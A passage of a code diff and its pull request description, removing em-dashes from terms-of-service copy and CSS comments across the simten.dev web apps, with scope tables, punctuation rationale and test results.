-          of or relating to your use of (or inability to use) the Service, even if advised of the
+          for any indirect, incidental, special, consequential, exemplary, or punitive damages,
+          including loss of profits, data, use, goodwill, or other intangible losses, arising out of
+          or relating to your use of (or inability to use) the Service, even if advised of the
           possibility of such damages.
         </p>
         <p>
           Where law prohibits exclusion of liability, our aggregate liability is limited to the
-          amount you have paid us for the Service in the twelve months preceding the claim — which,
+          amount you have paid us for the Service in the twelve months preceding the claim, which,
           for a free Service, is zero.
         </p>
 

--- a/apps/web/src/styles.css
+++ b/apps/web/src/styles.css
@@ -25,7 +25,7 @@
    Fumadocs's row offsets cascade from --fd-banner-height (see its
    container.js: --fd-docs-row-1 = var(--fd-banner-height, 0px)), so
    redefining it shifts the whole layout. We're not using fumadocs's
-   banner — this just hijacks the slot. See lib/layout.shared.tsx. */
+   banner; this just hijacks the slot. See lib/layout.shared.tsx. */
 :root {
 	--fd-banner-height: 48px;
 }
@@ -33,7 +33,7 @@
 @source "../../../packages/ui/src/**/*.tsx";
 @source "../../../packages/embed/src/**/*.tsx";
 /* Explicit so the standalone viewer build (vite.viewer.config.ts, root: viewer)
-   scans the app's own components too — its content auto-detection is rooted at
+   scans the app's own components too; its content auto-detection is rooted at
    viewer/, not apps/web/src, so app-only classes (h-screen, w-screen, …) would
    otherwise be dropped. Redundant but harmless in the main build. */
 @source "./**/*.{ts,tsx}";
@@ -118,7 +118,7 @@
   animation: shimmer 2s ease-in-out infinite;
 }
 
-/* Disable Geist Mono's programming ligatures in code blocks — `...` was
+/* Disable Geist Mono's programming ligatures in code blocks, since `...` was
    collapsing into `…` and visually fusing with `[` in spread expressions
    like `[...banner]`. Source still copy-pastes correctly either way. */
 .font-mono,


### PR DESCRIPTION
Removes em-dashes from reader-facing copy across simten.dev and play.simten.dev, and from the code comments in the same files.

## Scope

| Surface | Instances |
|---|---|
| Blog posts (13) | 273 |
| Docs MDX (14 files) | 367 |
| Game app | 171 |
| Learn pages + CPU debugger | 107 |
| Landing page + splash | 75 |
| Editor UI, MCP hooks, Verilog import | ~40 |
| Privacy + Terms | 15 |
| Site chrome, API handlers, misc components | ~60 |

## Meta descriptions

`posts.ts` descriptions feed `blogPostHead` -> `pageHead()` -> `<meta name="description">`, so they are what search results render. Fixed there, in the four docs frontmatter descriptions, and on `/circuit`. Also cleaned `aria-label="Simten — home"` in three headers/footers.

## Notes

- `aes-in-hardware` wrote its prose with a literal `—` rather than `&mdash;`, so an entity-only grep reported it as clean when it had 18 in body copy. Same trap in the `description=` props passed to circuit demos, which render on the page but read like data.
- Replacements vary by context — commas for parentheticals, full stops where it was two thoughts, colons where the second half defines the first, parentheses for bracketed asides, `&middot;` for UI status separators. Uniform comma-splicing would trade one habit for another.
- Two spots needed rewording rather than repunctuating: `CPU6502Section` had "Everything we've built — ... — are the building blocks", where dropping the dashes exposed a subject-verb disagreement; `sorting-networks` would have taken a third comma in one sentence.

## Left alone

18 "no value" markers: the `| — |` empty cells in the `component-model` primitive tables, one blank benchmark cell, and four greyed-out UI placeholders for a null PC or empty pipeline slot. These are table/UI convention, not prose.

`packages/*` and `apps/sandbox` hold ~1,840 more in library-internal JSDoc. Some of that surfaces in editor tooltips via the bundled `.d.ts` and is coupled to `jsdoc-meta-sync`, so it wants its own pass.

## Verification

- `tsc --noEmit` clean on both apps
- `@simten/web` 20/20, `@simten/game` 145/145 — the game suite covers the level briefs and `stub:` template literals that changed
- `pnpm biome ci` passes; warning count identical to the pre-change baseline
